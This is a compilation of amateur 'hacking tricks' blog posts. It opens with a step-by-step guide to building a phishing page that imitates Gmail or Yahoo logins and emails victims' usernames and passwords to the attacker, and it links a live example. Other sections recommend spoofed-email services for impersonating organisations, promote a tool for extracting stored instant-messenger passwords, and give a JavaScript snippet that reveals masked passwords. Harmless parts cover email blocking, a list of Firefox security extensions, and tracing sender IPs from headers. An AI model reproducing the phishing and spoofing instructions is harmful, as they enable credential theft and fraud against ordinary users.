Create A fake Login Page

fake Login Page is a fake Page which you can use to hack others username and password. fake Login Page looks exactly like the original Page and if someone Login in your Page using his original username and password, the username and password will be mailed to you
The process of Hacking anyone’s id using fake Login Page s is known as Phishing

Now let’s learn how to Create your very own fake Login Page .


{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to Create a hosting account which you can Create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you Create d your account at 110mb.com
now Login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url ofthe file.
And you will receive password of the users that Login to your site through email-id which you’ve entered while creating the form.
see my fake Login Page
www.citkatboy.110mb.com/index.html

How To Send Fake OR Anonymous Emails

Below is list of 4 Fake email service that allow you to Send Fake email to anyone .This service is maily used to prank yours friends and relatives ,you can prank by Send ing mail  on name of any website or Institute  like orkut@orkut.com or any other email id,Try it and Enjoy !

• Fake Mailer.Info – Helps you to Send Fake Emails and Prank your Friends! You Can Enter any Send er Name-Email you want and scare your Friends About their bills,Notice About their illegal internet activity or anything else you may want! Dont Forget To phone them after to tell that is just a prank.
• Anonymailer.net – Is the most trusted Anonymous email service that Send Anonymous email every day over hundreds of free Anonymous Emails are sent from this website,  You can use whatever e-mail address you like as a reply address.
• DeadFake -Use this web to Send an email to whoever you want. You can make it looks like it’s coming from anyone you like. Just fill in the form and  press Send .
• Fake mymail is another Fake email service that Send Fake email this service allows you to Send free prank Emails    to your friends and family. Send prank Emails and Fake Emails to anyone you want for a funny email prank anytime of day or night.
• Anonymous Speech.com is a Professional provider for secure Anonymous email, Here you need to create account to use this service,watch below video to know much more about this service .
Fake Email Prank – Funny bloopers are a click away

Note: X-( By Send ing a Fake email or prank email you may be committing the offence of fraud even you did not intend to. You are not allowed to use this service for any illegal activities at any time.All above r Fake email service is not liable for your Emails you Send at any time.

How To Block Unwanted Emails And Spamming

 Do you want to  Block Emails from your ex wife/husband? Do you want to Block those annoying offers and newsletters that reach your inbox? Well here is a way to Block all those Unwanted and annoying Emails that you do not want to see or read! With this trick you can Block individual email address or the whole domain from which you do not want the Emails to come from. Here are the step-by-step instructions to do this.
For Gmail
1. Login to your account
2. At the top-right corner, click on Settings
3. Under Settings, click on Filters
4. You’ll now see an option “Create a new filter“, click on it
5. Now in the From field enter the email address from which you do not want to receive the Emails
For ex. you may enter john@gmail .com in the From field to Block all incoming Emails from this address. How ever if you want to Block the whole domain then use the following syntax: *@xyz.com. Now all the incoming Emails from the domain xyz.com will be Block ed.
6. Click on Next Step, select the action you’d like to take on the Block ed Emails . You may select the option Delete it so that the Block ed email is moved to trash. To unBlock the email, all you need to do is just delete the filter that you’ve created.
For Yahoo
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. In the left panel select the option Filters and click on create or edit filters
5. Now click on Add
6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to Block .
Fox ex. john@gmail.com or if you want to Block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.
For Hotmail
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. Click on Safe and Block ed senders link under Junk e-mail
5. Now click on Block ed senders
6. Type in the email address that you want to Block under Block ed e-mail address or domain field.
For ex. Enter john@yahoo.com to Block the individual email address or just enter xyz.com to Block the entire domain.
That’s it. You no longer receive those annoying Emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!

Use Firefox As Your Ethical Hacking Platform And Toolkit

Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies,
shopping, working, “VoIPying”, spying other people and for sure auditing remote systems.

The security testers’ community has a large panel of security tools, methodologies and much more to perform
their pentests and audit assessments. But what happens if you find yourself weaponless.
No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor
without toolbox is like a cop without gun.

Nevertheless, there is maybe a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by Ethical hackers and coders.
This article comes as an update for what we posted previously about how to switch your Firefox to more than an usual simple browser. It was about application auditing.

Here is an updated list of useful security auditing extensions:
Information gathering
● Whois and geo-location

o ShowIP : Show the IP address of the current page in the status bar. It also allows querying
custom services by IP (right mouse button) and Hostname (left mouse button), like whois,
netcraft.
o Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping)
enables the user with one-click to map and geo-locate any website they are currently
viewing.
o HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info
data. Works with all versions of Firefox .
o Active Whois : Starting Active Whois to get details about any Web site owner and its host
server.
o Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It
includes (WhoIs, DNS Report, Geolocation, Traceroute, Ping). Very useful for information
gathering phase

● Enumeration / fingerprinting
o Header Spy : Shows HTTP headers on statusbar
o Header Monitor : This is Firefox extension for display on statusbar panel any HTTP
response header of top level document returned by a web server. Example: Server (by
default), Content-Encoding, Content-Type, X-Powered-By and others.
● Social engineering
o People Search and Public Record : This Firefox extension is a handy menu tool for
investigators, reporters, legal professionals, real estate agents, online researchers and
anyone interested in doing their own basic people searches and public record lookups as
well as background research.

● Googling and spidering
o Advanced dork : Gives quick access to Google’s Advanced Operators directly from the
context menu. This could be used to spider a site or scan for hidden files (this spider
technique is used via scroogle.org)
o SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from
www.httrack.com.
o View Dependencies : View Dependencies adds a tab to the "page info" window, in which it
lists all the files which were loaded to show the current page. (useful for a spidering
technique)
Security Assessment / Code auditing
● Editors
o JSView : The ’view page source’ menu item now opens files based on the behaviour you
choose in the jsview options. This allows you to open the source code of any web page in
a new tab or in an external editor.
o Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or Thunderbird: an
X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new
window) or saved to a file (in PEM or DER format - and PKCS#7 provided that the
respective patch has been applied - cf.
o Firebug : Firebug integrates with Firefox to put a wealth of development tools at your
fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript
live in any web page
o XML Developer Toolbar : Allows XML Developer’s use of standard tools all from your
browser.
● Headers manipulation
o HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response
header of top level document returned by a web server. Example: Server (by default),
Content-Encoding, Content-Type, X-Powered-By and others.
o RefControl : Control what gets sent as the HTTP Referrer on a per-site basis.
o User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the
browser
● Cookies manipulation
o Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved
cookies.
o CookieSwap : CookieSwap is an extension that enables you to maintain numerous sets or
"profiles" of cookies that you can quickly swap between while browsing
o httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as
httpOnly on the browser side
o Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt
file
● Security auditing
o HackBar : This toolbar will help you in testing SQL injections, XSS holes and site security. It
is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.
Its main purpose is to help a developer do security audits on his code.
o Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and post
parameters.
o Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in
the browser’s sidebar so you can write scripts to manipulate web pages and automate web
browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes
special functions specific to web tasks.
Tuning Firefox to an Ethical Hacking Platform
Proxy/web utilities
● FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox ’s
proxy configuration. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy,
ProxyTex, etc
● SwitchProxy : SwitchProxy lets you manage and switch between multiple proxy configurations
quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes
● POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side JavaScript (SJS) to run a
server inside your browser. Use it to distribute files from your browser. It supports Server-side JS,
GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your
site. Users have created a wiki, chat room and search engine using SJS.
Misc
● Hacks for fun
o Greasemonkey : Allows you to customize the way a webpage displays using small bits of
JavaScript (scripts could be download here)
● Encryption
o Fire Encrypter : FireEncrypter is a Firefox extension which gives you encryption/decryption
and hashing functionalities right from your Firefox browser, mostly useful for developers or
for education & fun.
Malware scanner
● QArchive.org web files checker : Allowing people to check web files for any malware (viruses,
trojans, worms, adware, spyware and other unwanted things) inclusions.
● Dr.Web anti-virus link checker : This plugin allows you to check any file you are about to download,
any page you are about to visit
● ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with
ClamWin.
Anti Spoof
● refspoof : Easy to pretend to origin from a site by overriding the URL referrer (in a http request). —
It incorporates this feature by using the pseudo-protocol spoof:// .. Thus it’s possible to store the
information in a "hyperlink" - that can be used in any context... like html pages or bookmarks


Feel free to send us (upgoingstar@yahoo.co.in) any useful information about security and audit oriented
Firefox extensions.

Reveal Passwords Behind *** Asterisks - Learn Latest Computer And Mobile Hackign Tricks

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.


javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox

How to hack, Crack, Find Lost Messenger Passwords

MessenPass – Free Software to Hack, Crack or Find Lost Messenger Passwords

Despite the fact that the title of this post mentions about Breaking MSN Messenger Passwords, this utility can be used to find your forgotten passwords of any of the following IM clients.

• MSN Messenger
• Windows Messenger (In Windows XP)
• Windows Live Messenger (In Windows XP And Vista)
• Yahoo Messenger (Versions 5.x and 6.x)
• Google Talk
• ICQ Lite 4.x/5.x/2003
• AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
• Trillian
• Trillian Astra
• Miranda
• GAIM/Pidgin
• MySpace IM
• PaltalkScene
• Digsby

It is an impressive list and contains almost all of the popular IM Client applications.

How to Use MessenPass to View or Find Lost IM Passwords.

When you run MessenPass, it automatically detects the Instant Messenger applications installed on your computer, decrypts the passwords they store, and displays all user name/password pairs that it found in the main window of MessenPass. If from some reason, MessenPass fails to locate the installed Instant Messenger application, you can try to manually select the right folder of your IM application by using ‘Select Folders’ option (from the File menu).
On the main window of MessenPass, you can select one or more password items, and then copy them to the clipboard in tab-delimited format (you can paste this format into Excel or Open-Office Spreadsheet), or save them into text/html files.

MessenPass can be used without any installation process, simply by running the executable file (mspass.exe) from the zip file, which you will get when you download this application from the link given below.

Download It here

How to find the IP address of the email sender in Gmail, Yahoo! mail or Hotmail

When you receive an email, you receive more than just the message.
The email comes with headers that carry important information that can
tell where the email was sent from and possibly who sent it.
For that, you would need to find the IP address of the sender.

The tutorial below can help you find the IP address of the sender.
Note that this will not work if the sender uses anonymous proxy servers.


Finding IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets.
In this case, it is

65.119.112.245.

That is be the IP address of the sender!
5. Track the IP address of the sender.


Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ].

Here, it is 202.65.138.109.
That is be the IP address of the sender!

6. Track the IP address of the sender

Finding IP address in Hotmail



1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address,
that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59].
Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multIPle Received: from headers, eliminate the ones that have proxy.
anyknownserver.com.
9. Track the IP address of the sender